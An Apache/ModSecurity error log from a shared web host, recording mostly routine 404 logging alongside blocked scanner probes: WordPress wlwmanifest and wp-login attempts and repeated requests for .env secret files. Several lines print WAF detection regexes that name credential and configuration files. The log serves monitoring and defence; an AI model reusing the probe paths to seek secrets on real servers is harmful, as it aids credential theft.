[Tue May 26 15:30:05.951437 2026] [security2:error] [pid 715645:tid 715787] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF-QAADGg"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.951450 2026] [security2:error] [pid 715645:tid 715776] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF_wAAAWk"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.952082 2026] [security2:error] [pid 715645:tid 715875] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF_AAAZFU"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.953613 2026] [security2:error] [pid 715645:tid 715894] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF_gAAd2o"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.958884 2026] [security2:error] [pid 715645:tid 715844] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgGAgAARXM"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.958999 2026] [security2:error] [pid 715645:tid 715820] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgGAAAALXA"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.962148 2026] [security2:error] [pid 715645:tid 715825] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF-wAAMhQ"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.962314 2026] [security2:error] [pid 715645:tid 715888] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgF-gAAcRg"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.963180 2026] [security2:error] [pid 715645:tid 715783] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgGAwAACAg"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:05.963571 2026] [security2:error] [pid 715645:tid 715835] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJXVGgMGh8k213RgGAQAAPDI"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.043507 2026] [security2:error] [pid 715645:tid 715806] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGCgAAH1w"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.048568 2026] [security2:error] [pid 715645:tid 715785] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGCwAACnI"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.058617 2026] [security2:error] [pid 715645:tid 715898] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGDAAAexk"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.062159 2026] [security2:error] [pid 715645:tid 715823] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGDQAAMBo"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.066068 2026] [security2:error] [pid 715645:tid 715804] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGDgAAHW4"], referer: https://ndequipments.com/listings/2018-kubota-kx018-4-compact-mini-excavator-with-three-buckets/
[Tue May 26 15:30:06.186232 2026] [security2:error] [pid 715645:tid 715778] [client 34.148.143.3:59167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJnVGgMGh8k213RgGFQAAAAM"]
[Tue May 26 15:30:06.413974 2026] [security2:error] [pid 715645:tid 715847] [client 139.212.70.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGGQAAAEg"]
[Tue May 26 15:30:06.693342 2026] [security2:error] [pid 715645:tid 715788] [client 34.148.143.3:52240] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJnVGgMGh8k213RgGIwAAAA0"]
[Tue May 26 15:30:07.032337 2026] [security2:error] [pid 715645:tid 715832] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvJnVGgMGh8k213RgGIgAAADk"]
[Tue May 26 15:30:07.136074 2026] [security2:error] [pid 715645:tid 715790] [client 34.148.143.3:53308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJ3VGgMGh8k213RgGMQAAAA8"]
[Tue May 26 15:30:07.584077 2026] [security2:error] [pid 715645:tid 715812] [client 34.148.143.3:57285] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "midrivermarina.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVvJ3VGgMGh8k213RgGOwAAACU"]
[Tue May 26 15:30:07.604264 2026] [security2:error] [pid 715645:tid 715824] [client 14.228.58.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvJ3VGgMGh8k213RgGOgAAADE"]
[Tue May 26 15:30:10.117439 2026] [security2:error] [pid 715645:tid 715817] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvKXVGgMGh8k213RgGawAAACo"]
[Tue May 26 15:30:10.332513 2026] [security2:error] [pid 715645:tid 715811] [client 202.76.141.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvKXVGgMGh8k213RgGcgAAACQ"]
[Tue May 26 15:30:12.349766 2026] [security2:error] [pid 715645:tid 715813] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvK3VGgMGh8k213RgGrAAAACY"]
[Tue May 26 15:30:14.878548 2026] [security2:error] [pid 715645:tid 715809] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvLnVGgMGh8k213RgG6QAAACI"]
[Tue May 26 15:30:16.830885 2026] [security2:error] [pid 715645:tid 715888] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvMHVGgMGh8k213RgHJwAAAHE"]
[Tue May 26 15:30:20.966352 2026] [security2:error] [pid 715645:tid 715779] [client 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvNHVGgMGh8k213RgHmgAABDA"], referer: https://ndequipments.com/contact-us/
[Tue May 26 15:30:20.966451 2026] [security2:error] [pid 715645:tid 715727] [remote 142.127.9.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahVvNHVGgMGh8k213RgHmQAAGlE"], referer: https://ndequipments.com/contact-us/
[Tue May 26 15:30:21.606297 2026] [security2:error] [pid 715645:tid 715818] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvNXVGgMGh8k213RgHpgAAACs"]
[Tue May 26 15:30:21.810433 2026] [security2:error] [pid 715645:tid 715840] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvNXVGgMGh8k213RgHrwAAAEE"]
[Tue May 26 15:30:22.131808 2026] [autoindex:error] [pid 715645:tid 715842] [client 77.74.177.114:40272] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:23.597371 2026] [security2:error] [pid 715645:tid 715862] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvN3VGgMGh8k213RgH4gAAAFc"]
[Tue May 26 15:30:23.615676 2026] [autoindex:error] [pid 715645:tid 715840] [client 77.74.177.114:35088] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:25.214639 2026] [autoindex:error] [pid 715645:tid 715869] [client 77.74.177.114:49634] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:26.214184 2026] [autoindex:error] [pid 715645:tid 715837] [client 77.74.177.118:13831] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:26.794989 2026] [security2:error] [pid 715645:tid 715896] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvOnVGgMGh8k213RgIPwAAAHk"]
[Tue May 26 15:30:28.210278 2026] [security2:error] [pid 715645:tid 715834] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvO3VGgMGh8k213RgIYgAAADs"]
[Tue May 26 15:30:30.162063 2026] [security2:error] [pid 715645:tid 715801] [client 69.58.76.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvPnVGgMGh8k213RgInAAAABo"], referer: https://anujtradingco.com
[Tue May 26 15:30:31.159461 2026] [security2:error] [pid 715645:tid 715832] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvPnVGgMGh8k213RgIrQAAADk"]
[Tue May 26 15:30:31.718432 2026] [security2:error] [pid 715645:tid 715898] [client 119.12.204.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVvP3VGgMGh8k213RgIyQAAAHs"]
[Tue May 26 15:30:32.876347 2026] [security2:error] [pid 715645:tid 715836] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvQHVGgMGh8k213RgI5AAAAD0"]
[Tue May 26 15:30:35.858467 2026] [security2:error] [pid 715645:tid 715847] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvQ3VGgMGh8k213RgJQAAAAEg"]
[Tue May 26 15:30:37.231870 2026] [security2:error] [pid 715645:tid 715864] [client 14.226.236.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvRHVGgMGh8k213RgJZgAAAFk"]
[Tue May 26 15:30:37.587737 2026] [security2:error] [pid 715645:tid 715836] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvRXVGgMGh8k213RgJcgAAAD0"]
[Tue May 26 15:30:40.408116 2026] [security2:error] [pid 715645:tid 715901] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvR3VGgMGh8k213RgJtgAAAH4"]
[Tue May 26 15:30:40.611231 2026] [security2:error] [pid 715645:tid 715756] [remote 109.228.50.118:54298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVvSHVGgMGh8k213RgJxAAAN24"]
[Tue May 26 15:30:40.769571 2026] [autoindex:error] [pid 715645:tid 715787] [client 198.235.24.57:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:30:42.017056 2026] [security2:error] [pid 715645:tid 715652] [remote 209.42.18.223:52386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVvSXVGgMGh8k213RgJ5AAAAwY"]
[Tue May 26 15:30:42.923452 2026] [security2:error] [pid 715645:tid 715818] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvSnVGgMGh8k213RgJ-wAAACs"]
[Tue May 26 15:30:43.258090 2026] [security2:error] [pid 715645:tid 715667] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahVvS3VGgMGh8k213RgKGAAAeBU"]
[Tue May 26 15:30:43.259557 2026] [security2:error] [pid 715645:tid 715667] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.staging.unsobered.com"] [uri "/*update.cgi*"] [unique_id "ahVvS3VGgMGh8k213RgKGgAAeBU"]
[Tue May 26 15:30:43.281159 2026] [security2:error] [pid 715645:tid 715783] [client 87.166.55.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVvSnVGgMGh8k213RgKAQAAAAg"], referer: https://houstontxmobilecovidlab.taotechservices.com/
[Tue May 26 15:30:43.400079 2026] [security2:error] [pid 715645:tid 715662] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend/.env"] [unique_id "ahVvS3VGgMGh8k213RgKLAAAeBA"]
[Tue May 26 15:30:43.406472 2026] [security2:error] [pid 715645:tid 715754] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.docker/.env"] [unique_id "ahVvS3VGgMGh8k213RgKOAAAeGw"]
[Tue May 26 15:30:43.422539 2026] [security2:error] [pid 715645:tid 715660] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVvS3VGgMGh8k213RgKQwAAeA4"]
[Tue May 26 15:30:44.426028 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKRQAAAHs"]
[Tue May 26 15:30:44.426776 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKRgAAABI"]
[Tue May 26 15:30:44.427347 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKTAAAACs"]
[Tue May 26 15:30:44.427921 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKPQAAADA"]
[Tue May 26 15:30:44.428381 2026] [security2:error] [pid 715645:tid 715676] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/.env"] [unique_id "ahVvS3VGgMGh8k213RgKcQAAeB4"]
[Tue May 26 15:30:44.429205 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvS3VGgMGh8k213RgKIgAAAHA"]
